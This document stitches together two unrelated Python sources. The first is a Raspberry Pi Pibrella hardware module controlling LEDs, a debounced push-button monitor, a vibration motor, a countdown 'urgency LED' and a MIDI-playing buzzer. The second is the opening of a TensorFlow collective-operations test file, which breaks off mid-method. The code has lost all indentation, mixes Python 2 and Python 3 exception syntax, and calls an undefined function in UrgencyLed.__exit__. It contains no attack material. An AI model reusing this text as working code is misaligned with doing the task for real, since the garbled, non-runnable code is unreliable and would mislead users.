return False
# ------------------------------------------------------------------------------
class Led(ILed):
"""
TODO class comment
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
config):
"""Initializes the LED class
TODO Detailed multi-line description if
necessary.
Args:
name (string): Name of this instance of the LED class. Example "Bob"
config (Config): Configuration object for the LED class
Returns:
N/A
Raises:
N/A
"""
self.Name = name
self.FlashingOnDuration_s = 0.5
self.FlashingOffDuration_s = 0.5
# Store results of what type of LED we are controlling
# default to pibrella
self._LedType = LedType.pibrella
if hasattr(config, 'LedType'):
if config.LedType.lower().startswith("adafruit"):
self._LedType = LedType.adafruit
if self._LedType == LedType.pibrella:
self.outputPin = getattr(pibrella.light, config.OutputPin)
else:
# TODO verify channel is valid
self.outputPin = PibrellaLedFacade(int(name), 4095, 16, False)
def stop(self):
if self._LedType == LedType.adafruit:
self.outputPin.stop()
# --------------------------------------------------------------------------
def turnOn(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
#logger.debug('Set LED steady ON \"%s\".', self.Name)
self.outputPin.on()
# --------------------------------------------------------------------------
def turnOff(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
#logger.debug('Set LED steady OFF \"%s\".', self.Name)
self.outputPin.off()
# --------------------------------------------------------------------------
def setFlashing(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Set LED flashing \"%s (%s..%s)\".',
self.Name,
self.FlashingOnDuration_s,
self.FlashingOffDuration_s)
# Pulse function, FadeInTime_s, FadeOutTime_s, OnTime_s, OffTime_s
self.outputPin.pulse(0, 0, self.FlashingOnDuration_s, self.FlashingOffDuration_s)
# --------------------------------------------------------------------------
def fade(self, startPercentageOn, endPercentageOn, durationInSeconds):
""" See interface definition
"""
self.outputPin.fade(startPercentageOn, endPercentageOn, durationInSeconds)
# --------------------------------------------------------------------------
def decay(self):
""" See interface definition
"""
self.outputPin.decay()
# ------------------------------------------------------------------------------
class PushButtonMonitor(IPushButtonMonitor):
"""
TODO class comment
"""
PRESSED = 1
RELEASED = -1
NEXT_STATE = (0, 1, 0, 3, 2, 3, 0, 3)
OUTPUT = (0, 0, 0, PRESSED, 0, 0, RELEASED, 0)
NUM_STATES = len(NEXT_STATE)
BUTTONS = (LCD.SELECT, LCD.RIGHT, LCD.DOWN, LCD.UP, LCD.LEFT)
NUM_BUTTONS = len(BUTTONS)
BUTTON_NAMES = ("SELECT", "RIGHT", "DOWN", "UP", "LEFT")
DEBOUNCE_INTERVAL = 0.05 # sec. (= sampling rate of 20 Hz)
# --------------------------------------------------------------------------
def __init__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Constructing push button monitor')
self._device = None # button interface device
self._buttonStates = [0] * self.NUM_BUTTONS # last sampled debounce state, one per button
self._debounceButtons = False # whether to perform software debounce
self._pushButtons = {}
self._listening = False
self._timeToExit = False
self._onTickCallback = None
self._thread = Thread(target = self.run)
self._thread.daemon = True
self._thread.start()
# --------------------------------------------------------------------------
def setOnTickCallback(self, cb=None):
""" Attach a callback that gets called once per iteration of the button polling loop.
"""
self._onTickCallback = cb
# --------------------------------------------------------------------------
def setDevice(self, dev):
""" Register the hardware device for the push buttons.
"""
self._device = dev
# --------------------------------------------------------------------------
def __enter__(self):
logger.debug('Entering push button monitor')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting push button monitor')
self.stopListening()
self._timeToExit = True
self._thread.join()
# --------------------------------------------------------------------------
def startListening(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Starting listening for push button monitor')
# TODO
self._listening = True
# --------------------------------------------------------------------------
def stopListening(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopping listening for push button monitor')
self._listening = False
# --------------------------------------------------------------------------
def registerPushButton(self,
name,
buttonPressHandler,
config):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# TODO[BEGIN]
keypress = config.HwKeyPress
if keypress in self._pushButtons:
logger.warning('Console key [%s] already registered to push button %s; redefining to register to push button %s' %
(keypress, self._pushButtons[keypress].Name, name))
self._pushButtons[keypress] = PushButton(name, buttonPressHandler)
logger.debug('Registered push button %s for key press [%s]' %
(name, keypress))
# TODO[END]
# --------------------------------------------------------------------------
def pollPushButtons(self):
""" Sample the current state of the push buttons, detect changes.
Poll the input buttons. Does a little debounce. Not sure if it is
necessary.
Button state transitions:
| button input
current state | 0 | 1
------------------------------------------------------------------
0 (released) | 0 | 1
1 (maybe pressed) | 0 | 3 (emit PRESSED)
3 (pressed) | 2 | 3
2 (maybe released) | 0 (emit RELEASED) | 3
"""
if self._debounceButtons:
# Sample the current state of all buttons
buttonInputs = map(self._device.is_pressed, self.BUTTONS)
# Convert prevState, input to an index = 2*state + input
buttonStateTransitions = map(lambda s,i: 2*s+(1 if i else 0), self._buttonStates, buttonInputs)
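# Worked example, added for clarity: a button in state 1 ('maybe pressed') that
# reads input 1 gives index 2*1 + 1 = 3, so NEXT_STATE[3] = 3 ('pressed') and
# OUTPUT[3] = PRESSED is emitted.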
# Use the transition to lookup the next state
self._buttonStates = [self.NEXT_STATE[i] for i in buttonStateTransitions]
# Use the transition to lookup the output value
outputs = [self.OUTPUT[i] for i in buttonStateTransitions]
else:
outputs = map(self._device.is_pressed, self.BUTTONS)
# Make a list of buttons that changed to PRESSED and a list of buttons
# that changed to RELEASED
edges = ([i for i in range(self.NUM_BUTTONS) if outputs[i] == self.PRESSED],
[i for i in range(self.NUM_BUTTONS) if outputs[i] == self.RELEASED])
# Report the buttons that changed
if len(edges[0]):
self.deliverButtonPressEvents(edges[0])
if len(edges[1]):
self.deliverButtonReleaseEvents(edges[1])
# --------------------------------------------------------------------------
def deliverButtonPressEvents(self, buttons):
""" Call the push callback for buttons that were pressed
"""
for b in buttons:
button = self._pushButtons[self.BUTTON_NAMES[b]]
button.Handler(button.Name)
# --------------------------------------------------------------------------
def deliverButtonReleaseEvents(self, buttons):
""" Call the push callback for buttons that were pressed
There are no handlers defined for release events, so this method
does nothing.
"""
pass
# --------------------------------------------------------------------------
def onTick(self):
""" Calls user-supplied callback for each iteration of the polling loop.
Attach a custom callback by calling self.setOnTickCallback().
"""
if self._onTickCallback:
self._onTickCallback()
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# with NonBlockingConsole() as nbc:
logger.debug('Starting key press thread for push button monitor')
while not self._timeToExit:
try:
if self._listening:
self.pollPushButtons()
self.onTick() # event callback for animation
sleep(self.DEBOUNCE_INTERVAL)
except Exception, e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in push button monitor" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
# ------------------------------------------------------------------------------
class VibrationMotor(IVibrationMotor):
"""
TODO class comment
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
outputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this motor, example "Huey"
outputPin (string): Letter Designation of Pin , "E", "F", "G", or"H"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
#TODO - Need to get these from config file [SS]
#self.OnDuration_s = 0.5
#self.OffDuration_s = 0.5
self.outputPin = getattr(pibrella.output, outputPin)
# --------------------------------------------------------------------------
def __enter__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Entering vibration motor %s', self.Name)
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting vibration motor %s', self.Name)
self.stop()
# --------------------------------------------------------------------------
def start(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Started vibration motor \"%s\".', self.Name)
self.outputPin.on()
# --------------------------------------------------------------------------
def stop(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopped vibration motor \"%s\".', self.Name)
self.outputPin.off()
# ------------------------------------------------------------------------------
class UrgencyLed(IUrgencyLed):
# --------------------------------------------------------------------------
def __init__(self,
name,
outputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this motor, example "Huey"
outputPin (string): Letter Designation of Pin , "E", "F", "G", or"H"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
logger.debug('Constructing urgency LED %s' % (self.Name))
#TODO - Need to get these from config file [SS]
self.min_period_ms = 300
self.max_period_ms = 2000
self.outputPin = getattr(pibrella.output, outputPin)
self._timeToExit = False
self._transitionToStarted = False
self._thread = Thread(target = self.run)
self._thread.daemon = True
self._thread.start()
# --------------------------------------------------------------------------
def __enter__(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Entering urgency LED %s', self.Name)
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting urgency LED %s', self.Name)
self.stop()
stopListening(self)
self._timeToExit = True
self._thread.join()
# --------------------------------------------------------------------------
def computeDelay(self,
percentComplete):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
delay_ms = (1.0 - percentComplete) * self.max_period_ms + percentComplete * self.min_period_ms
logger.debug('computeDelay({}) returning {}'.format(percentComplete, delay_ms))
return delay_ms
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.info('Starting thread for urgency LED %s' % (self.Name))
delay_s = self.max_period_ms / 1000.0
while not self._timeToExit:
try:
if self._transitionToStarted:
now = datetime.datetime.now()
currentDelta = now - self.startTime
current_ms = int(currentDelta.total_seconds() * 1000.0)
delay_ms = self.computeDelay(current_ms * 1.0 / self.boom_ms)
delay_s = delay_ms / 1000.0
if self.flag:
self.flag = False
self.outputPin.off()
logger.debug('urgency LED \"%s\" pin off.', self.Name)
sleepDelay_s = delay_s - (self.min_period_ms / 1000.0)
else:
self.flag = True
self.outputPin.on()
logger.debug('urgency LED \"%s\" pin on.', self.Name)
sleepDelay_s = self.min_period_ms / 1000.0
logger.debug('current_ms={} vs. boom_ms={} => quotient={}, delay_ms={}, delay_s={}, sleepDelay_s={}'.format(current_ms, self.boom_ms, current_ms * 1.0 / self.boom_ms, delay_ms, delay_s, sleepDelay_s))
if current_ms >= self.boom_ms:
logger.info('Urgency LED %s transitioning to stopped.' % (self.Name))
self._transitionToStarted = False
delay_s = self.max_period_ms / 1000.0
sleepDelay_s = delay_s
logger.debug('Urgency LED thread sleeping for {} sec with flag={}.'.format(sleepDelay_s, self.flag))
else:
pass # Nothing to do
sleepDelay_s = delay_s
sleep(sleepDelay_s)
            except Exception as e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in urgency LED %s: %s" % (exType.__name__, self.Name, str(e)))
traceback.print_tb(tb)
logger.info('Stopping thread for urgency LED %s' % (self.Name))
# --------------------------------------------------------------------------
def start(self,
total_epoch_ms):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.flag = True
self.outputPin.on()
self.startTime = datetime.datetime.now()
self.boomTime = self.startTime + datetime.timedelta(milliseconds=total_epoch_ms)
self.boomDelta = self.boomTime - self.startTime
self.boom_ms = int(self.boomDelta.total_seconds() * 1000.0)
logger.info('Urgency LED {} transitioning to started at time {} for boom at {} with total_epoch_ms={}.'.format(self.Name, self.startTime, self.boomTime, total_epoch_ms))
self._transitionToStarted = True
# --------------------------------------------------------------------------
def stop(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stopped urgency LED \"%s\".', self.Name)
self.outputPin.off()
self._transitionToStarted = False
# ------------------------------------------------------------------------------
class Buzzer(IBuzzer):
"""
    The Buzzer class enables a pibrella buzzer to play or stop a
    single note, or to play a preconfigured song asynchronously.
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
config):
"""Initializes the Buzzer class
TODO Detailed multi-line description if
necessary.
Args:
name (string): Name of this instance of the Buzzer class. Example "Bob"
config (Config): Conifg object containing an array named Song which is an
array of configuration objects with Tone and Duration.
Where Tone is an int from 0-TBD and Duration is a number
with the duration of time in seconds.
Returns:
N/A
Raises:
N/A
"""
self.Name = name
# Copy the song to play
self._song = []
self.TotalDuration = 0
for i in config.Song:
# TODO verify there is not just a copy constructor for config
# TODO verify tone is an int and Duration is a number
tmp = Config()
isFile = False
hasTrack = False
# Depending on how used these might not be there
if hasattr(i, 'File') and i.File != None:
tmp.File = i.File
isFile = True
if hasattr(i, 'Track') and i.Track != None:
tmp.Track = i.Track
hasTrack = True
if hasattr(i, 'Tone') and i.Tone != None:
tmp.Tone = i.Tone
if hasattr(i, 'Duration') and i.Duration != None:
tmp.Duration = i.Duration
self._song.append(tmp)
if isFile and hasTrack:
if os.path.isfile(i.File):
# this is likely a midi now things get hard
try:
logger.debug('Opening midi file \"%s\".' % (i.File))
mid = MidiFile(i.File)
logger.debug('Opened midi file \"%s\".' % (i.File))
# now find the track
                        for track in mid.tracks:
if hasattr(track, 'name') and track.name == i.Track:
for message in track:
if message.type == 'note_on':
# need to force data type to avoid int division
duration = 0.0 + message.time
elif message.type == 'note_off':
duration = message.time - duration
if duration > 0:
self.TotalDuration += duration/1000.0
                    except Exception as e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
else:
# The file does not exist
logger.critical("The buzzer %s file %s does not exist", self.Name, i.File)
else:
# duration is easy just add em up
self.TotalDuration += i.Duration
self._setBuzzer()
self._stopPlaying = False
self._isWaitingForPlay = True
self._isCutShort = False
self._thread = Thread(target=self.run)
self._thread.start()
# --------------------------------------------------------------------------
def _setBuzzer(self):
self._buzzer = getattr(pibrella, 'buzzer')
# --------------------------------------------------------------------------
def __enter__(self):
logger.debug('Entering Buzzer')
return self
# --------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Exiting Buzzer')
# This did not appear to be getting called so moved to stop
# --------------------------------------------------------------------------
def stop(self):
self.off()
self._isWaitingForPlay = True
self._stopPlaying = True
logger.debug('Before Join in Buzzer stop')
self._thread.join()
logger.debug('After Join in Buzzer stop')
# --------------------------------------------------------------------------
def play(self):
"""Asynchronously plays this Buzzer's song.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer starting to play configured song')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to restart it
self.off()
self._isWaitingForPlay = False
# --------------------------------------------------------------------------
def playSynchronously(self):
"""Synchronously plays this Buzzer's song.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer starting to play configured song')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to restart it
self.off()
self._isWaitingForPlay = True
self._playOnce()
# --------------------------------------------------------------------------
def note(self,
tone):
"""Has the buzzer hold a note unit off is called.
So pibrella docs are light but looking at it's source code would suggest
that the tone field is the standard midi value minus 69 so negative is
allowed and 0-11 would be with higher or lower values just in different
octaves:
note_key = ['A','A#','B','C','C#','D','D#','E','F','F#','G','G#']
As -49 would be below midi A0 this value is used to denote a rest.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Buzzer playing note %s' % tone)
# TODO verify tone is an int
if (not self._stopPlaying) and (not self._isWaitingForPlay):
# The song is already playing so need to stop it
self.off()
if not (tone == '-'):
self._buzzer.note(tone)
# --------------------------------------------------------------------------
def off(self):
"""Stops playing the buzzer's song or note.
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
logger.debug('Stop playing Buzzer')
if (not self._stopPlaying) and (not self._isWaitingForPlay):
self._isCutShort = True
while self._isCutShort:
sleep(0.0001)
self._buzzer.off()
# --------------------------------------------------------------------------
def _playOnce(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
for i in self._song:
# first assess if this is a string of notes or a midi file
if hasattr(i,'File'):
# this is likely a midi
try:
mid = MidiFile(i.File)
# now find the track to play
for track in mid.tracks:
if hasattr(track, 'name') and track.name == i.Track:
for message in track:
# if asynch give a way to stop
if self._stopPlaying or self._isCutShort:
self._buzzer.off()
self._isCutShort = False #reset for next run
break
if message.type == 'note_on':
note = message.note - 69
self._buzzer.note(note)
# need to force data type to avoid int division
duration = 0.0 + message.time
elif message.type == 'note_off':
duration = message.time - duration
if duration > 0:
sleep(duration/1000.0)
self._buzzer.off()
self._buzzer.off()
                except Exception as e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
else:
try:
# if asynch give a way to stop
if self._stopPlaying or self._isCutShort:
self._buzzer.off()
                        self._isCutShort = False  # reset for next run
break
if i.Tone == -49:
self._buzzer.off()
else:
self._buzzer.note(i.Tone)
sleep(i.Duration)
self._buzzer.off()
                except Exception as e:
exType, ex, tb = sys.exc_info()
logger.critical("Exception occurred of type %s in Buzzer run" % (exType.__name__))
logger.critical(str(e))
traceback.print_tb(tb)
# End for i
self._isWaitingForPlay = True
# --------------------------------------------------------------------------
def run(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
# Note doing it this way gets rid of issue of restarting a thread
# if you need to stop short, but it chews up CPU
# TODO there needs to be a better way of using a worker thread instead
# of a self thread but still be able to signal the worker thread to stop
# early without relying on a member variable.
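        # A possible alternative (just a sketch, not what this class does):
        # block on a threading.Event that play() sets, which would avoid the
        # busy sleep(0.001) loop below at the cost of a small refactor.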
while not self._stopPlaying:
if self._isWaitingForPlay:
sleep(0.001)
else:
self._playOnce()
logger.debug('Run over for Buzzer')
# ------------------------------------------------------------------------------
class FakeHwBuzzer():
"""
    The FakeHwBuzzer class simulates the pibrella buzzer interface, making
    no noise but still allowing debug info to be displayed.
"""
# --------------------------------------------------------------------------
def off(self):
pass
# --------------------------------------------------------------------------
def note(self, tone):
pass
# Inheriting from Buzzer to attempt to keep this timing as close as HW as possible.
# ------------------------------------------------------------------------------
class SilentBuzzer(Buzzer):
"""
    The SilentBuzzer class enables a fake console buzzer to play or stop a
    single note, or to play a preconfigured song asynchronously.
"""
# --------------------------------------------------------------------------
def _setBuzzer(self):
self._buzzer = FakeHwBuzzer()
# ------------------------------------------------------------------------------
class Input(IInput):
"""
    Wraps a pibrella input pin so its current value can be read.
"""
# --------------------------------------------------------------------------
def __init__(self,
name,
inputPin):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
name (string): Name of this input, example "lightDetector"
inputPin (string): Letter Designation of Pin , "a", "b", "c", or"d"
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
self.Name = name
self._inputPin = getattr(pibrella.input, inputPin)
# --------------------------------------------------------------------------
def read(self):
"""TODO strictly one-line summary
TODO Detailed multi-line description if
necessary.
Args:
arg1 (type1): TODO describe arg, valid values, etc.
arg2 (type2): TODO describe arg, valid values, etc.
arg3 (type3): TODO describe arg, valid values, etc.
Returns:
TODO describe the return type and details
Raises:
TodoError1: if TODO.
TodoError2: if TODO.
"""
return self._inputPin.read()
# ------------------------------------------------------------------------------
# Module Initialization
# ------------------------------------------------------------------------------
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
handler = logging.handlers.SysLogHandler(address = '/dev/log')
logger.addHandler(handler)
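# ------------------------------------------------------------------------------
# Minimal usage sketch (an assumption about how this module is driven by the
# surrounding application; the pin letters and names below are illustrative).
if __name__ == '__main__':
    with VibrationMotor('Huey', 'E') as motor:
        motor.start()
        sleep(1.0)
        motor.stop()
    logger.info('Input a reads %s' % Input('lightDetector', 'a').read())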
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
